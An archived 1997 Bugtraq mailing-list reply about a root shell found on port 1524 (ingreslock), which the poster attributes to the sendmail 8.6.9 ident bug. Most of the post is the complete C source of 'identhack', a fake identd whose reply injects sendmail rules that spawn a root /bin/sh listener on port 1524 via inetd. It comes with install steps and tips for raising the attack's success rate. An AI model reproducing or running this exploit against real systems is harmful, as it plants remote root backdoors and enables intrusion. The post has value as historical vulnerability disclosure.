[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Re: Ingreslock Misconfiguration?
From: Matt <panzer () DHP ! COM>
Date: 1997-01-28 6:52:21
[Download RAW message or body]
Khelbin Sunvold <khelbin@CONNIX.COM> wrote:
> Just fooling around the other day on a box running ingres and i tried
> telneting to port 1524 (ingreslock) and was surprised to be dropped into a
> root shell.
Perhaps they were running 8.6.9 also.... See below:
--
-Matt (panzer@dhp.com) -- DataHaven Project - http://www.dhp.com/
"That which can never be enforced should not be prohibited."
/* identhack - sendmail identd hack.
* Michael R. Widner - atreus (2/24/95)
* <widner@uchicago.edu> <atreus@primus.com>
*
* Make sure you don't do anything evil with this. That would be wrong.
*
* This is a real simple hacked identd that will return a string to abuse
* the sendmail 8.6.9 identd problem.
* NOTE: This hack only works when sendmail queues up the message for
* later delivery. This depends on the configuration of sendmail.cf and
* on the machine loading. If you can do something to drag the machine to
* its knees, then fire off this attack, you stand a much better chance of
* success.
*
* This should compile ok with just [g]cc -o identhack identhack.c
* Then add an appropriate entry in your inetd.conf and kill -HUP identd.
* ident stream tcp nowait root /tmp/identhack in.identd
* (identd port is 113, but hopefully your /etc/services knows that)
*
* Two noteworthy things: Most people configure their sendmail.cf with
* Og1 and Ou1 lines, setting the default user to bin.bin. I see no way
* to break root using this method if this is the case. bin seems like the
* best case scenario.
*/
#include <sys/types.h>
#include <sys/fcntl.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* TIMEOUT is the number of seconds to wait before closing the connection if
* the client doesn't provide the port pairs.
*/
#define TIMEOUT 120
/* PROCINFO_BUFFER_SIZE must be bigger than 80 */
#define OUTPUT_BUFFER_SIZE 2048
#define SOCKET_BUFFER_SIZE 100
unsigned short lport = 0, rport = 0;
void
main ()
{
unsigned long here, there;
struct fd_set fdset;
struct timeval timeout;
char buffer[OUTPUT_BUFFER_SIZE];
char inbuffer[SOCKET_BUFFER_SIZE];
int len;
int fd;
/* prepare to read ports */
FD_ZERO (&fdset);
FD_SET (0, &fdset);
timeout.tv_sec = TIMEOUT;
timeout.tv_usec = 0;
/* read ports from stdin */
select (1, &fdset, NULL, NULL, &timeout);
len = read (0, inbuffer , SOCKET_BUFFER_SIZE - 1 );
if (len <= 0)
exit (0);
FD_SET (0, &fdset);
sprintf (buffer, "%s : USERID : UNIX : %s\r\n", inbuffer,
"atreus)\r\nCroot\r\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nMlocal, \
P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nR<\"|/bin/echo ingreslock stream tcp nowait root \
/bin/sh /bin/sh > /tmp/badfile\">\r\nR<\"|/usr/etc/inetd /tmp/badfile\">\r\n$rascii \
The choice of commands to execute is virtually limitless. I chose to startup a copy \
of inetd with /bin/sh answering on the ingreslock port, which is 1524. I only chose \
this particular port because it's in most /etc/services and sun inetd won't accept \
port numbers here, only services defined in /etc/services or services.byname if \
you're using yp. Of course the syntax will vary by systems, as will the location of \
inetd. So an intruder must at least know what type of system he's going after."); \
write (1, buffer, strlen (buffer)); exit (0);
}
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic